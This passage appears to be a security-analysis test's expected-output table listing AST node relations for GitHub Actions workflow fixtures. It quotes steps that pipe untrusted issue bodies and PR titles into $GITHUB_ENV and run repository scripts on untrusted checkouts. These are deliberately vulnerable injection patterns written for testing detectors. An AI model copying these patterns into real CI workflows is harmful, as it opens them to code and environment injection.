.github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | 
.github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> 
$GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho 
"FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" 
>> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 
'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| 
.github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | 
github.workspace | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. 
venv/bin/activate | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| 
.github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | 
.github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | 
.github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | 
on: push | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" 
\| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test 
foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| 